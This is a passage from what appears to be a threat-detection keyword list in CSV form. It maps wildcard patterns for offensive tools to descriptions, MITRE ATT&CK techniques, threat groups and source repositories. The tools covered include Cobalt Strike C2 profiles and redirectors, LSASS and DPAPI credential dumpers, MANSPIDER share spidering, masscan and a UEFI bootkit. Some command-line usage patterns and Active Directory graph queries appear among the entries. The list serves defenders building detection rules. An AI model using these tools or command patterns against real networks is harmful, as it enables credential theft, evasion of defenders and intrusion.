T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*Malleable PE/Stage*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*malleable_redirector.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*malleable_redirector_hidden_api_endpoint*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*Malleable-C2-Profiles*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Malleable-C2-Randomizer*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*Malleable-C2-Randomizer*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*malleable-c2-randomizer.py*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*MalleableProfileB64*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*MalleableProfiles.vue*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*malleable-redirector-config*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*MalSCCM.exe*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*MalSCCM-main*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*malware.NewConfig*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*malwaredllc*,offensive_tool_keyword,byob,BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch,T1024 - T1059 - T1064 - T1002 - T1071,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/malwaredllc/byob,1,0,N/A,N/A,10,8504,2072,2023-10-02T14:55:32Z,2017-12-18T09:10:12Z -*man_in_the_browser.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*man_spider.manspider:main*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*ManagedEasyHook.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*manageengine_adselfservice_plus_cve_2022_28810.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*manageengine_xnode/CVE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*manager/keepass.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*manager/mRemoteNG.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*mandiant/DueDLLigence*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*mandiant/gocrack*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*mandllinject *,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,0,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*manspider * -d * -u * -p *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider */24 -f *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider --threads * -d * -u * -H * --content admin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*manspider*--loot-dir*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider*--sharenames*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider.py*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider.spiderling*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider_scan*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*MANSPIDER-master*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*map_payload_dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*map-get-tls-alternative-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*mapper_cve_exploit.py*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*masky_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*masscan -c *,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan --nmap*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan -p*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan* -p*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*massdns -r *.txt*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*master/bootkit/src*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*master/EncryptedZIP*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/HookDetector*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/ImplantSSP/*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/SwampThing*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*master/UnquotedPath*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers in Unconstrained Delegations,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers AllowedToDelegate to other computers,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive 